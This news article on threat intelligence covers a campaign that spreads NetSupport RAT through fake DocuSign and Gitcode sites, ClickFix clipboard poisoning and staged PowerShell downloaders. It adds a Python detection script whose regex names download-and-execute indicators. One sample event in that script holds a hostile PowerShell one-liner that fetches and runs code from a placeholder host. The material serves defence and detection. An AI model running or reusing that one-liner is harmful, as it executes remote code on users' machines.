Distribution of NetSupport RAT through Multifaceted PowerShell Attack on Counterfeit DocuSign and Gitcode Websites


Threat hunters have identified a recent campaign utilizing deceptive websites to lure unsuspecting users into executing malicious PowerShell scripts, ultimately infecting their systems with the NetSupport RAT malware.

The DomainTools Investigations (DTI) team reported detection of “malicious multi-stage downloader PowerShell scripts” hosted on fraudulent websites posing as Gitcode and DocuSign.

The sites aim to mislead users into copying and executing an initial PowerShell script within the Windows Run command. This execution initiates a sequence where the initial script downloads a secondary downloader script, which further retrieves additional payloads, culminating in the installation of NetSupport RAT on the compromised systems.

It is suspected that these counterfeit sites proliferate through social engineering tactics via email or social media platforms.

The PowerShell scripts hosted on the fake Gitcode sites are crafted to download successive intermediate scripts from an external server. These scripts work in tandem to launch the NetSupport RAT on victim machines.

DomainTools also detected multiple sites impersonating DocuSign, such as docusign.sa[.]com, to deploy the same remote access trojan, albeit with an additional layer: employing ClickFix-style CAPTCHA verifications to manipulate victims into executing the malicious PowerShell script.

Similar to recent cases involving EDDIESTEALER infostealer attacks, users arriving at these pages are prompted to complete a CAPTCHA verification to prove they are not bots.

Interacting with the CAPTCHA results in an obfuscated PowerShell command being secretly copied to the user’s clipboard, a technique known as clipboard poisoning. Users are then directed to open the Windows Run dialog, paste the command, and execute it.

This PowerShell script is designed to download a persistence script to ensure the payload launches automatically upon user login.

Though the payload was inaccessible during the investigation, it is expected to interact with the delivery site at docusign.sa[.]com/verification/c.php, subsequently refreshing the browser to display content from docusign.sa[.]com/verification/s.php?an=1.

This process triggers the delivery of a second-stage PowerShell script, which then downloads and executes a third-stage ZIP payload from the same server while modifying the URL parameter. The final script unpacks the archive and executes an executable named “jp2launcher.exe,” facilitating the deployment of the NetSupport RAT.
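The chain described above leaves two observable events on the endpoint: a PowerShell process started from the Run dialog (so its parent is explorer.exe) with a command line that fetches and runs remote code, and a jp2launcher.exe started by PowerShell from a user-writable directory rather than from a Java installation under Program Files. The following detection logic is an added example written for this page, not code from DomainTools or from the campaign itself; it assumes Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine, User), and every sample event, including the example.invalid host and the file paths, is constructed.

```python
"""Two detection rules for the ClickFix / Run-dialog PowerShell chain and the
jp2launcher.exe stage. Event records mimic Sysmon Event ID 1 fields; all
sample data below is constructed for illustration."""

import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Command-line indicators of a one-liner that pulls and executes remote code.
DOWNLOAD_EXEC_PATTERNS = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b|frombase64string|"
    r"-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)

POWERSHELL_NAMES = ("powershell.exe", "pwsh.exe")

# Directory fragments a standard user can write to without elevation.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\",
                 "\\programdata\\", "\\public\\")

# Constructed sample events: one Run-dialog stage, one unpacked jp2launcher.exe,
# one legitimate Java jp2launcher.exe, and one benign scripted PowerShell run.
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/c.php | iex"',
     "User": "CORP\\alice"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\client\jp2launcher.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "jp2launcher.exe",
     "User": "CORP\\alice"},
    {"Image": r"C:\Program Files\Java\jre\bin\jp2launcher.exe",
     "ParentImage": r"C:\Program Files\Java\jre\bin\javaws.exe",
     "CommandLine": "jp2launcher.exe -secure",
     "User": "CORP\\bob"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1",
     "User": "CORP\\svc_backup"},
]


def _basename(path: str) -> str:
    """Lower-cased file name component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def run_dialog_powershell(ev: Event) -> bool:
    """Rule 1: PowerShell spawned by explorer.exe (Win+R Run dialog or Start
    menu) whose command line carries download-and-execute indicators."""
    return (
        _basename(ev["Image"]) in POWERSHELL_NAMES
        and _basename(ev["ParentImage"]) == "explorer.exe"
        and bool(DOWNLOAD_EXEC_PATTERNS.search(ev["CommandLine"]))
    )


def suspicious_jp2launcher(ev: Event) -> bool:
    """Rule 2: jp2launcher.exe (normally shipped with Java under Program Files)
    running from a user-writable directory or launched by PowerShell."""
    if _basename(ev["Image"]) != "jp2launcher.exe":
        return False
    image = ev["Image"].lower()
    return (any(frag in image for frag in USER_WRITABLE)
            or _basename(ev["ParentImage"]) in POWERSHELL_NAMES)


RULES = {
    "run_dialog_powershell_download": run_dialog_powershell,
    "jp2launcher_unexpected_context": suspicious_jp2launcher,
}


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, rule_name in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{rule_name}] user={ev['User']} image={ev['Image']}")
```

Rule 1 keys on the parent process rather than on any particular domain because the delivery hosts change between campaigns while the Run-dialog launch path does not; expect to tune it for environments where users legitimately start PowerShell from the Start menu. For forensic confirmation after the fact, the RunMRU key under the user's hive (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) retains what was pasted into the Run dialog even when the process logs are gone.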

The multi-layered approach of scripts that perpetuate further downloads and executions is likely aimed at circumventing detection and enhancing resilience against security investigations.

The exact actors behind this campaign remain unidentified; however, DomainTools highlighted similarities in the delivery URLs, domain naming, and registration patterns with a previously detected SocGholish (FakeUpdates) campaign from October 2024.

It is important to note that the techniques employed are widely recognized, and NetSupport Manager is a legitimate administration tool often misused by various threat groups such as FIN7, Scarlet Goldfinch, Storm-0408, among others.